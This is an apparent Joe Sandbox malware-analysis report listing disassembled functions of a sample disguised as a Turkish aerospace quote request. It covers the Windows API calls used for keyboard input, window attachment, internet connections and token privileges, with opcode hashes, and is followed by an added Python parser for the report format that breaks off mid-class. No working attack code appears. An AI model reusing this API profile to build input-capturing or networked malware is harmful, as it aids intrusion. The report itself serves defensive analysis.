• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: KeyboardState$InputMessagePostSend
• String ID:
• API String ID: 432972143-0
APIs
• GetKeyboardState.USER32(?,76C1C0D0,?,00008000), ref: 01000C66
• SetKeyboardState.USER32(00000080,?,00008000), ref: 01000C82
• PostMessageW.USER32(00000000,00000101,00000000), ref: 01000CE1
• SendInput.USER32(00000001,?,0000001C,76C1C0D0,?,00008000), ref: 01000D33
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: KeyboardState$InputMessagePostSend
• String ID:
• API String ID: 432972143-0
APIs
• _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00FD61FB
• __isleadbyte_l.LIBCMT ref: 00FD6229
• MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00FD6257
• MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00FD628D
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
• String ID:
• API String ID: 3058430110-0
APIs
• GetForegroundWindow.USER32 ref: 01024F02
  • Part of subcall function 01003641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0100365B
  • Part of subcall function 01003641: GetCurrentThreadId.KERNEL32 ref: 01003662
  • Part of subcall function 01003641: AttachThreadInput.USER32(00000000,?,01005005), ref: 01003669
• GetCaretPos.USER32(?), ref: 01024F13
• ClientToScreen.USER32(00000000,?), ref: 01024F4E
• GetForegroundWindow.USER32 ref: 01024F54
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
• String ID:
• API String ID: 2759813231-0
APIs
  • Part of subcall function 00FA2612: GetWindowLongW.USER32(?,000000EB), ref: 00FA2623
• GetCursorPos.USER32(?), ref: 0102C4D2
• TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00FDB9AB,?,?,?,?,?), ref: 0102C4E7
• GetCursorPos.USER32(?), ref: 0102C534
• DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00FDB9AB,?,?,?), ref: 0102C56E
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: Cursor$LongMenuPopupProcTrackWindow
• String ID:
• API String ID: 2864067406-0
• Opcode ID: e8aa62b5655f1838bf9bb270be98b5c20a090aeac03ea569afd2d1aef1b807da
• Instruction ID: 1527163b5c37cf381370a52c172083962b88559186bfd1214030abbb455fe2d1
• Opcode Fuzzy Hash: e8aa62b5655f1838bf9bb270be98b5c20a090aeac03ea569afd2d1aef1b807da
• Instruction Fuzzy Hash: 8F31C135600038AFEB65CF5CC858EAE7FF5EB09390F444099FA858B261CB359990DBA4
APIs
  • Part of subcall function 00FF810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00FF8121
  • Part of subcall function 00FF810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00FF812B
  • Part of subcall function 00FF810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00FF813A
  • Part of subcall function 00FF810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00FF8141
  • Part of subcall function 00FF810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00FF8157
• LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00FF86A3
• _memcmp.LIBCMT ref: 00FF86C6
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 00FF86FC
• HeapFree.KERNEL32(00000000), ref: 00FF8703
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
• String ID:
• API String ID: 1592001646-0
• Opcode ID: 767e2bd48431ce061db6095f431b4ef31059272e84a820cdd74c52883f4c45b5
• Instruction ID: bc3408d7cc8cce69c82f8ba8f7eb3c00bdc3dc1649b0b5bee5f5efc22c08387c
• Opcode Fuzzy Hash: 767e2bd48431ce061db6095f431b4ef31059272e84a820cdd74c52883f4c45b5
• Instruction Fuzzy Hash: 96216972E0010DEBDB10DFA4CA49BFEB7B8EF45394F154059E544AB250EB35AE06EB90
APIs
• __setmode.LIBCMT ref: 00FC09AE
  • Part of subcall function 00FA5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,01007896,?,?,00000000), ref: 00FA5A2C
  • Part of subcall function 00FA5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,01007896,?,?,00000000,?,?), ref: 00FA5A50
• _fprintf.LIBCMT ref: 00FC09E5
• OutputDebugStringW.KERNEL32(?), ref: 00FF5DBB
  • Part of subcall function 00FC4AAA: _flsall.LIBCMT ref: 00FC4AC3
• __setmode.LIBCMT ref: 00FC0A1A
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
• String ID:
• API String ID: 521402451-0
• Opcode ID: 6719359f6138ba435c7e99f6cd745d0ff89dbf588b120b9ac9415733b89bd530
• Instruction ID: 169806085914589823341841466f748e417b257795081fc396db12ed21d50a36
• Opcode Fuzzy Hash: 6719359f6138ba435c7e99f6cd745d0ff89dbf588b120b9ac9415733b89bd530
• Instruction Fuzzy Hash: 42112772908206AFDB04B6B49C47FFEB768AF46320F14005DF205561C2EE7D5C4677A5
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 010117A3
  • Part of subcall function 0101182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0101184C
  • Part of subcall function 0101182D: InternetCloseHandle.WININET(00000000), ref: 010118E9
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: Internet$CloseConnectHandleOpen
• String ID:
• API String ID: 1463438336-0
• Opcode ID: 11c8a45c3219f50e2c4da7cc002fdf87a1cb62ca3a4c221035f356077795f919
• Instruction ID: b2b22fbeb5c3166912632b1d052602e2bb07c7c17812065b83d4bccc10631744
• Opcode Fuzzy Hash: 11c8a45c3219f50e2c4da7cc002fdf87a1cb62ca3a4c221035f356077795f919
• Instruction Fuzzy Hash: 70219231200606BFEB269F74DC00FBABBF9FF48710F10401AFB9196654DB79941197A0
APIs
• GetFileAttributesW.KERNEL32(?,0102FAC0), ref: 01003A64
• GetLastError.KERNEL32 ref: 01003A73
• CreateDirectoryW.KERNEL32(?,00000000), ref: 01003A82
• CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0102FAC0), ref: 01003ADF
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: CreateDirectory$AttributesErrorFileLast
• String ID:
• API String ID: 2267087916-0
• Opcode ID: 6b74f7110fc17020b38423d83ebba1d4fde87ccba3d1043f35e7eb3688e1831a
• Instruction ID: 26eae621515b8783b53977de38b428d11eca7d22e65b7aa99763aa7cb00bfd57
• Opcode Fuzzy Hash: 6b74f7110fc17020b38423d83ebba1d4fde87ccba3d1043f35e7eb3688e1831a
• Instruction Fuzzy Hash: 2F2171745082029F9712EF28C88186B7BE4BE5B764F104A5EF4D9CB2D1DB31D949CB92
APIs
• GetWindowLongW.USER32(?,000000EC), ref: 01025D80
• SetWindowLongW.USER32(?,000000EC,00000000), ref: 01025D9A
• SetWindowLongW.USER32(?,000000EC,00000000), ref: 01025DA8
• SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 01025DB6
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: Window$Long$AttributesLayered
• String ID:
• API String ID: 2169480361-0
• Opcode ID: 2b847fb8da10c75cc1031ca5c3ae4fdead74065719449a0d9da7797b4666b92e
• Instruction ID: 50c987423a52976d7fda6dab83dd88afc5b29b65b8702b3ca92c5074ff85daa0
• Opcode Fuzzy Hash: 2b847fb8da10c75cc1031ca5c3ae4fdead74065719449a0d9da7797b4666b92e
• Instruction Fuzzy Hash: D811D631205121AFDB24AF14DC08FBF77A9EF86360F144218F956D72E2C7A8AD01C754
APIs
  • Part of subcall function 00FFF0BC: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00FFDCD3,?,?,?,00FFEAC6,00000000,000000EF,00000119,?,?), ref: 00FFF0CB
  • Part of subcall function 00FFF0BC: lstrcpyW.KERNEL32(00000000,?,?,00FFDCD3,?,?,?,00FFEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00FFF0F1
  • Part of subcall function 00FFF0BC: lstrcmpiW.KERNEL32(00000000,?,00FFDCD3,?,?,?,00FFEAC6,00000000,000000EF,00000119,?,?), ref: 00FFF122
• lstrlenW.KERNEL32(?,00000002,?,?,?,?,00FFEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00FFDCEC
• lstrcpyW.KERNEL32(00000000,?,?,00FFEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00FFDD12
• lstrcmpiW.KERNEL32(00000002,cdecl,?,00FFEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00FFDD46
Strings
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: lstrcmpilstrcpylstrlen
• String ID: cdecl
• API String ID: 4031866154-3896280584
• Opcode ID: 26f85fb3b3298914a1fe3e4397fab80825741640527ddbbf1f02081e60b5bdf3
• Instruction ID: 19aa0581980c7020100804d8809b487f170e22db0ad8a8b845f7943b10c152e3
• Opcode Fuzzy Hash: 26f85fb3b3298914a1fe3e4397fab80825741640527ddbbf1f02081e60b5bdf3
• Instruction Fuzzy Hash: 9C11B13A200309EBCB259F34C845D7E77A9FF45350B50802AFA06CB260EB759841E790
APIs
• _free.LIBCMT ref: 00FD5101
  • Part of subcall function 00FC571C: __FF_MSGBANNER.LIBCMT ref: 00FC5733
  • Part of subcall function 00FC571C: __NMSG_WRITE.LIBCMT ref: 00FC573A
  • Part of subcall function 00FC571C: RtlAllocateHeap.NTDLL(011E0000,00000000,00000001,00000000,?,?,?,00FC0DD3,?), ref: 00FC575F
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: AllocateHeap_free
• String ID:
• API String ID: 614378929-0
• Opcode ID: 476683930c519bff05b60b3ad96e150aa029fed8ac33395a68b6c873c27281cc
• Instruction ID: 75d3cf9ee324b2ca358a8578228d250ac6f0e5ed84eb53fbec72c091d78692e2
• Opcode Fuzzy Hash: 476683930c519bff05b60b3ad96e150aa029fed8ac33395a68b6c873c27281cc
• Instruction Fuzzy Hash: BA11E772904A13AECB312F74AD06B5D37A9AF50BF1B24452FF9489A350DE398C41B790
APIs
• _memset.LIBCMT ref: 00FA44CF
  • Part of subcall function 00FA407C: _memset.LIBCMT ref: 00FA40FC
  • Part of subcall function 00FA407C: _wcscpy.LIBCMT ref: 00FA4150
  • Part of subcall function 00FA407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00FA4160
• KillTimer.USER32(?,00000001,?,?), ref: 00FA4524
• SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00FA4533
• Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00FDD4B9
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
• String ID:
• API String ID: 1378193009-0
• Opcode ID: 2ba4dca891086ec79bcbf9e5779ec44627da12e0745e89aeba41fb8c3a3ffab5
• Instruction ID: 091fb3bc2e1d8989a2c0b81ad2480b8eaf486d5a7907ea03025df4f5431b2048
• Opcode Fuzzy Hash: 2ba4dca891086ec79bcbf9e5779ec44627da12e0745e89aeba41fb8c3a3ffab5
• Instruction Fuzzy Hash: B021F8B5D043849FE732CB248855BE6BBECAB02318F18008EE6CE56241C7B53984E741
APIs
  • Part of subcall function 00FA5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,01007896,?,?,00000000), ref: 00FA5A2C
  • Part of subcall function 00FA5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,01007896,?,?,00000000,?,?), ref: 00FA5A50
• gethostbyname.WSOCK32(?,?,?), ref: 01016399
• WSAGetLastError.WSOCK32(00000000), ref: 010163A4
• _memmove.LIBCMT ref: 010163D1
• inet_ntoa.WSOCK32(?), ref: 010163DC
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
• String ID:
• API String ID: 1504782959-0
• Opcode ID: 42c18067e9ce103dac91991ed1e74b0c269f72dddc329a728e61dae585d807b3
• Instruction ID: b24b876de6b98964038d81bab4eaf4141f39a23612c10cf298408ae646200184
• Opcode Fuzzy Hash: 42c18067e9ce103dac91991ed1e74b0c269f72dddc329a728e61dae585d807b3
• Instruction Fuzzy Hash: EA115E7550010AAFCB00FFA4DD46DEFB7B8AF09310B144069F505A7161DF79AE04EB61
APIs
• SendMessageW.USER32(?,000000B0,?,?), ref: 00FF8B61
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 00FF8B73
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 00FF8B89
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 00FF8BA4
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: 8a3ea32cabcd3242f4ce41281c6056181bcb364ccf26dd66d48feaa85481fb4c
• Instruction ID: 6d45098d878b07ce6bd70dfac0382362ce64a3cbe925a99571578835d9abc16c
• Opcode Fuzzy Hash: 8a3ea32cabcd3242f4ce41281c6056181bcb364ccf26dd66d48feaa85481fb4c
• Instruction Fuzzy Hash: 87110A79901218BFDB11DFA5C885FADBB74FF48750F204095EA00B7260DA716E11EB94
APIs
  • Part of subcall function 00FA2612: GetWindowLongW.USER32(?,000000EB), ref: 00FA2623
• DefDlgProcW.USER32(?,00000020,?), ref: 00FA12D8
• GetClientRect.USER32(?,?), ref: 00FDB5FB
• GetCursorPos.USER32(?), ref: 00FDB605
• ScreenToClient.USER32(?,?), ref: 00FDB610
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: Client$CursorLongProcRectScreenWindow
• String ID:
• API String ID: 4127811313-0
• Opcode ID: 10e3cbb6d98d87e72a916d56163fda3f55e99f3352b784c234a3cee04e3f19f7
• Instruction ID: 106a220edd62adfea0cec918c504a2225776d3291cd241ba71644581aa704c0e
• Opcode Fuzzy Hash: 10e3cbb6d98d87e72a916d56163fda3f55e99f3352b784c234a3cee04e3f19f7
• Instruction Fuzzy Hash: 39110D75A0001AEFCB20DFA8D989AEE77F8FB0A341F510455F941E7240C735FA519BA5
APIs
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00FFFCED,?,01000D40,?,00008000), ref: 0100115F
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,00FFFCED,?,01000D40,?,00008000), ref: 01001184
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00FFFCED,?,01000D40,?,00008000), ref: 0100118E
• Sleep.KERNEL32(?,?,?,?,?,?,?,00FFFCED,?,01000D40,?,00008000), ref: 010011C1
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: CounterPerformanceQuerySleep
• String ID:
• API String ID: 2875609808-0
• Opcode ID: 872be46037749ab4ebdd9e52f7f9e8299223b64ba47b578220d95ec7589f6f86
• Instruction ID: ff3d50d47fbd63c11ac00ed91cd9f1bb9024568466fe35e16ec7e77389e50e1f
• Opcode Fuzzy Hash: 872be46037749ab4ebdd9e52f7f9e8299223b64ba47b578220d95ec7589f6f86
• Instruction Fuzzy Hash: 97115A31C0061DE7DF159FA4D848AEEBBB8FF09751F504045EA80B2281CB359550CBD1
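The function blocks in this part of the report all share one shape: an "APIs" list of call sites (some attributed to a subcall of the function), a "Memory Dump Source" section, the IDA plugin snapshot file, and a "Similarity" section carrying the API ID, the Opcode ID and the two fuzzy hashes. The parser below reads that shape so the blocks can be filtered or compared programmatically instead of by eye. It is an added example for working with the report text, not part of the report and not Joe Sandbox's own tooling; the line grammar is inferred from the blocks shown here (no published spec is assumed), the sample input is constructed from lines copied out of this report, and the dotted .sdmp name is only split into fields because the report does not document what each field means.

```python
"""Parser for the per-function "APIs" / "Memory Dump Source" / "Similarity"
blocks that the Joe Sandbox IDA plugin emits in this report.  Added example
for working with the report text; not part of the report or of Joe Sandbox."""
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample: lines copied from function blocks in this report and
# combined into one block, so the parser sees direct calls, one nested
# "Part of subcall function" line, a CRT call with no argument list,
# and the metadata sections.
SAMPLE_BLOCK = """APIs
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00FFFCED,?,01000D40,?,00008000), ref: 0100115F
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,00FFFCED,?,01000D40,?,00008000), ref: 01001184
  • Part of subcall function 00FA5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,01007896,?,?,00000000), ref: 00FA5A2C
• _memmove.LIBCMT ref: 010163D1
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
Similarity
• API ID: CounterPerformanceQuerySleep
• String ID:
• API String ID: 2875609808-0
• Opcode ID: 872be46037749ab4ebdd9e52f7f9e8299223b64ba47b578220d95ec7589f6f86
• Instruction Fuzzy Hash: 97115A31C0061DE7DF159FA4D848AEEBBB8FF09751F504045EA80B2281CB359550CBD1
"""

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# Grammar inferred from the blocks in this report (no published spec assumed):
#   [  ]• [Part of subcall function <addr>: ]<name>.<MODULE>[(<args>)][,] ref: <addr>
API_LINE = re.compile(
    r"^\s*• (?:Part of subcall function (?P<callee>[0-9A-F]{8}): )?"
    r"(?P<name>\w+)\.(?P<module>[A-Z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]{8})\s*$")
META_LINE = re.compile(r"^\s*• (?P<key>[^:]+):\s*(?P<value>.*)$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: list                     # raw stack slots; "?" = value not recovered by the plugin
    ref: str                       # address of the call site
    callee: Optional[str] = None   # set when the line is attributed to a subcall of this function

    def unresolved(self) -> int:
        return sum(1 for a in self.args if a == "?")


@dataclass
class FunctionBlock:
    calls: list = field(default_factory=list)
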